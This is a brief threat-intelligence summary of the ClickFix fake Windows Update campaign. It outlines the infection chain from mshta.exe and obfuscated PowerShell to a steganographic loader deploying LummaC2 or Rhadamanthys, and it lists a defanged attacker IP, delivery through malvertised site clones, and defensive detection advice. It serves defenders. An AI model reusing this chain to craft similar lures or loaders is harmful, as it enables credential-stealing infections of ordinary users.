Overview
- Huntress and other researchers confirm the full‑screen Windows Update ruse remains active in late November, even after Operation Endgame curtailed Rhadamanthys delivery on some domains that still host the lure pages.
- The attacks follow a consistent chain starting with mshta.exe to JavaScript, then obfuscated PowerShell that loads a .NET Stego Loader to extract Donut‑packed shellcode from PNG pixels and deploy LummaC2 or Rhadamanthys.
- Campaign infrastructure is rotating, with domains changing URIs and an IP address of 141.98.80[.]175 cited; first‑stage URLs feature a hex‑encoded second octet linked across observed incidents.
- Distribution now includes malvertised adult‑site clones that hijack the screen and attempt to block escape keys, and some lure code contains Russian‑language developer comments, according to Acronis and Huntress.
- Microsoft reports ClickFix is the leading initial access method at 47% of attacks, and defenders are urged to disable the Windows Run box, train users to never paste commands from webpages, and monitor for explorer.exe spawning mshta.exe or PowerShell.